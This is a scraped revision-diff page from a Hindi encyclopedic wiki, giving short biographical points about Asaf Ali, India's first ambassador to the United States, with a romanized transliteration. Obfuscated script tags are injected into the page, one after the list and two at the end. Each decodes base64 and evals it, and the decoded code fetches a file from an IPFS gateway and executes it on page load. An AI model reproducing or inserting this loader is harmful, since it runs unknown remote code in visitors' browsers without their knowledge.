Difference between revisions of "आसफ़ अली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*आसफ़ अली [[अमेरिका]] में [[भारत]] के प्रथम राजदूत थे। तत्पश्चात आसफ़ अली [[ओडिशा|उड़ीसा]] के [[राज्यपाल]] बने।  
+
*आसफ़ अली [[अमेरिका]] में [[भारत]] के प्रथम राजदूत थे। तत्पश्चात् आसफ़ अली [[ओडिशा|उड़ीसा]] के [[राज्यपाल]] बने।  
*आसफ़ अली ने पहले एक वकील के रूप में अपने को स्थापित किया। आसफ़ अली ने होमरूल आन्दोलन में सक्रिय भाग लिया।  
+
*आसफ़ अली ने पहले एक वकील के रूप में स्वयं को स्थापित किया। आसफ़ अली ने 'होमरूल आन्दोलन' में सक्रिय भाग लिया।  
 
*आसफ़ अली ने [[कांग्रेस]] द्वारा चलाये गये सभी आन्दोलनों में भाग लिया तथा कई बार जेल भी गये।  
 
*आसफ़ अली ने [[कांग्रेस]] द्वारा चलाये गये सभी आन्दोलनों में भाग लिया तथा कई बार जेल भी गये।  
 
*1927 ई. में आसफ़ अली कांग्रेस के महासचिव बने। 1945 ई. में आसफ़ अली [[आज़ाद हिन्द फ़ौज]] के अधिकारियों के बचाव के लिए बनी प्रतिरक्षा समिति के अध्यक्ष बने।  
 
*1927 ई. में आसफ़ अली कांग्रेस के महासचिव बने। 1945 ई. में आसफ़ अली [[आज़ाद हिन्द फ़ौज]] के अधिकारियों के बचाव के लिए बनी प्रतिरक्षा समिति के अध्यक्ष बने।  
*1946 ई. में बनी अंतरिम सरकार में आसफ़ अली मंत्री के रूप में सम्मिलित हुए।  
+
*1946 ई. में बनी [[भारत]] की अंतरिम सरकार में आसफ़ अली मंत्री के रूप में सम्मिलित हुए।  
 
*संविधान सभा की कार्यवाहियों में भी आसफ़ अली की महत्त्वपूर्ण भूमिका रही।  
 
*संविधान सभा की कार्यवाहियों में भी आसफ़ अली की महत्त्वपूर्ण भूमिका रही।  
 
*आसफ़ अली की स्विट्ज़रलैण्ड में राजदूत के रूप में कार्य करते हुए उनकी मृत्यु हो गई।
 
*आसफ़ अली की स्विट्ज़रलैण्ड में राजदूत के रूप में कार्य करते हुए उनकी मृत्यु हो गई।

Latest revision as of 07:52, 23 June 2017

  • asaf ali amerika mean bharat ke pratham rajadoot the. tatpashchath asaf ali u disa ke rajyapal bane.
  • asaf ali ne pahale ek vakil ke roop mean svayan ko sthapit kiya. asaf ali ne 'homarool andolan' mean sakriy bhag liya.
  • asaf ali ne kaangres dvara chalaye gaye sabhi andolanoan mean bhag liya tatha kee bar jel bhi gaye.
  • 1927 ee. mean asaf ali kaangres ke mahasachiv bane. 1945 ee. mean asaf ali azad hind fauj ke adhikariyoan ke bachav ke lie bani pratiraksha samiti ke adhyaksh bane.
  • 1946 ee. mean bani bharat ki aantarim sarakar mean asaf ali mantri ke roop mean sammilit hue.
  • sanvidhan sabha ki karyavahiyoan mean bhi asaf ali ki mahattvapoorn bhoomika rahi.
  • asaf ali ki svitzaralaind mean rajadoot ke roop mean kary karate hue unaki mrityu ho gee.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>